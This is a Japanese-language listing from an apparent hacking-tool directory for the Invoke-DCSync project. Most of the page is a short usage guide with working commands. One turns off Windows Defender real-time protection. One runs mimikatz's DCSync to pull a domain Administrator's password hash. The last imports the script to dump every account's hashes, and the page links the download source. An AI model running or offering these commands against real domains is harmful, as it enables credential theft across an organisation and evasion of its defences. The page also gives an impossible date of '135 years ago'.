Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/al1ex/invoke-dcsync
Password AttacksExploitationLateral MovementPost-ExploitationPenetration TestingRed Teaming
GitHubal1ex/invoke-dcsync

Invoke-DCSync

Invoke-DCSync

リポジトリを見る
135年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Invoke-DCSync

Invoke-DCSync 参照: https://adsecurity.org/?p=1729 参照: https://silentbreaksecurity.com/invoke-dcsync-because-we-all-wanted-it/ 目的: mimikatz の DCSync 機能を使用して、ドメインコントローラー上のすべてのユーザーアカウントからパスワードハッシュを取得します。

警告:これはラボ環境でのみ行ってください。

mimikatz は DCSync と呼ばれるツールを実装しました。これにより、mimikatz はドメインコントローラーを偽装し、別のドメインコントローラーからすべてのパスワードハッシュの取得を試みることができます。

Windows Defender を無効にする必要があるかもしれません。

管理者として PowerShell を開き、次のように入力します。

$ Set-MpPreference -DisableRealtimeMonitoring $true

mimikatz を起動します。

$ lsadump::dcsync /domain:test.local /user:Administrator

これで、そのユーザーのパスワードハッシュが取得できました。

これには、Administrator アクセス権、具体的には Get-Replication-Changes-All Common Name 属性が必要です。

Invoke-DCSync モジュールを使用して、すべてのハッシュを抽出できます。

ダウンロード元: https://gist.github.com/monoxgas/9d238accd969550136db

root@kitploit:~
$ Import-Module ./Invoke-DCSync.ps1
$ Invoke-DCSync -PWDumpFormat
ツールをダウンロード